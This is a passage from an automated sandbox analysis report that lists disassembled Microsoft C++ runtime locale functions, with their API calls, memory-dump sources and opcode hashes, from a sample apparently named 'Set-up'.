                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC25FF3
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC26007
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC26016
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26026
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2602C
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26039
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: e0f47c61e7f1e258dd1de5613d0e326bda2c0efbc411d3f5cccc696918d92c53
                                                                                              • Instruction ID: 20eed45552c8372baae4df26d799b1fc6f040d9b03bc93c28cd2affc89f22fcf
                                                                                              • Opcode Fuzzy Hash: e0f47c61e7f1e258dd1de5613d0e326bda2c0efbc411d3f5cccc696918d92c53
                                                                                              • Instruction Fuzzy Hash: EC01C4319206199BCF05DBB4C892AAE73357F85724F500568E121BB2D0FB3C9B01EB61
                                                                                              Function 6BC3CCD8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CCDF
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CCE9
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CD00
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CD09
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC3CD23
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CD37
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CD46
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CD56
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CD5C
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CD69
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_G@std@@@std@@@std@@Getcat@?$time_put@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@V42@@V?$ostreambuf_iterator@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1124765478-3145022300
                                                                                              • Opcode ID: 21a44d42dd8fe2be1c3af48ab9d95ae3fff354638440ba8c3ee128b601253203
                                                                                              • Instruction ID: 8d85ad471a66e219a68a3a8fd5fe039f3a760c2849a5b3b034ef06004e539171
                                                                                              • Opcode Fuzzy Hash: 21a44d42dd8fe2be1c3af48ab9d95ae3fff354638440ba8c3ee128b601253203
                                                                                              • Instruction Fuzzy Hash: 8001C0319206399BCF01DBB4C852AAE7731AF84724F940528E120BB2D0FF3C9B01DB61
                                                                                              Function 6BC3CC35 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CC3C
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CC46
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CC5D
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CC66
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3CC80
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CC94
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CCA3
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CCB3
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CCB9
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CCC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 85c0019df5d748544163051efbe8acea8e6fc32d702b1176d6c1f46a4b490686
                                                                                              • Instruction ID: baa458ec836a9d77f3724ac9f59251909c39dfa796ea9f76f57c8a255fad8950
                                                                                              • Opcode Fuzzy Hash: 85c0019df5d748544163051efbe8acea8e6fc32d702b1176d6c1f46a4b490686
                                                                                              • Instruction Fuzzy Hash: 8E01A1319206399BCF05DBB0D8526AEB335AF81724F940129E1607B290FB3C9B019B61
                                                                                              Function 6BC1E3A1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1E3A8
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3B2
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3C9
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC1E3D2
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC1E3EC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC1E400
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC1E40F
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC1E41F
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC1E425
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC1E432
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$ctype@_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@W@std@@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 2584096039-3145022300
                                                                                              • Opcode ID: 81f000259268f5d9324118d33fb825d353553bad4d1e89cd616b43b673bc0139
                                                                                              • Instruction ID: 40401912f9dcc65c9abf13254849b0a77f79b8b6dd0eceb42c44f8e02b5a6edc
                                                                                              • Opcode Fuzzy Hash: 81f000259268f5d9324118d33fb825d353553bad4d1e89cd616b43b673bc0139
                                                                                              • Instruction Fuzzy Hash: 51018B3192462A9BCF00DBB4C852AED7331AF85728F540528E121BB290FB3C9B01EB61
                                                                                              Function 6BC3A361 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3A368
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3A372
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3A389
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3A392
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC3A3AC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3A3C0
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3A3CF
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3A3DF
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3A3E5
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3A3F2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$codecvt@_GetfacetGetgloballocale@locale@std@@H@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 576096907-3145022300
                                                                                              • Opcode ID: 2ac553cbdb3478414d39053b82a2da3ab61c663cdcb64f4a2b9696c479561cd1
                                                                                              • Instruction ID: 291bfe75779709353436c29e4a0e745770236c943dc871878d31b1b1fd7f70c9
                                                                                              • Opcode Fuzzy Hash: 2ac553cbdb3478414d39053b82a2da3ab61c663cdcb64f4a2b9696c479561cd1
                                                                                              • Instruction Fuzzy Hash: 6601A1329355299BCF05DBB4C852AADB3356F81724F900528E1207B2A0FB3CDB01DB61
                                                                                              Function 6BC3D37A Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D381
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D38B
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D3A2
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D3AB
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC3D3C5
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3D3D9
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D3E8
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D3F8
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D3FE
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D40B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_G@std@@@std@@@std@@Getcat@?$time_get@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@V42@@V?$istreambuf_iterator@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 984978972-3145022300
                                                                                              • Opcode ID: 51e8ce76edce613371abf9ac4bd92f2941789c4f5f8c4e438b18eb4f5f93b16c
                                                                                              • Instruction ID: 85d2b32e45555e1389f8dedd7d869cd43efd4c4bd5fb068c23a8f14af5fa24bf
                                                                                              • Opcode Fuzzy Hash: 51e8ce76edce613371abf9ac4bd92f2941789c4f5f8c4e438b18eb4f5f93b16c
                                                                                              • Instruction Fuzzy Hash: 2E01C43192062997CF05DBB4C952AEEB731AF80724F540169E124BB2E0FB3C9B05DB61
                                                                                              Function 6BC3D2D7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D2DE
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F287,?), ref: 6BC3D2E8
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F287,?), ref: 6BC3D2FF
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D308
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D322
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F287,?), ref: 6BC3D336
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D345
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F287,?), ref: 6BC3D355
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D35B
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F287,?), ref: 6BC3D368
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              • Opcode ID: 49a86173c217c1039138eba027cfc76802e9e7063459cc6a9504ba667bccbdaa
                                                                                              • Instruction ID: c5480bef42265677bf16ff6fe3b4f53129c0dde05d6523d1dad301e4cd60bf8e
                                                                                              • Opcode Fuzzy Hash: 49a86173c217c1039138eba027cfc76802e9e7063459cc6a9504ba667bccbdaa
                                                                                              • Instruction Fuzzy Hash: 9201C43192062997CF01DBB4C8526AD7335BF81728F940168E121BB2D0FB3C9B059B61
                                                                                              Function 6BC262D7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC26322
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC26336
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC26345
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26355
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2635B
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 09286645c01c349cb7ac981cccae2ebbe5c28ea50d60e57c8e6dd5916b619015
                                                                                              • Instruction ID: 1a978b1d43b4d702a98225ee5a2ba2454b7fb0f17554fd5886aa8e05bfffa233
                                                                                              • Opcode Fuzzy Hash: 09286645c01c349cb7ac981cccae2ebbe5c28ea50d60e57c8e6dd5916b619015
                                                                                              • Instruction Fuzzy Hash: 90016D31924A2997CF05DBB4C852AEEB3357F81728F500569E121BB2A0FF3C9B05DB61
                                                                                              Function 6BC1E2FE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1E305
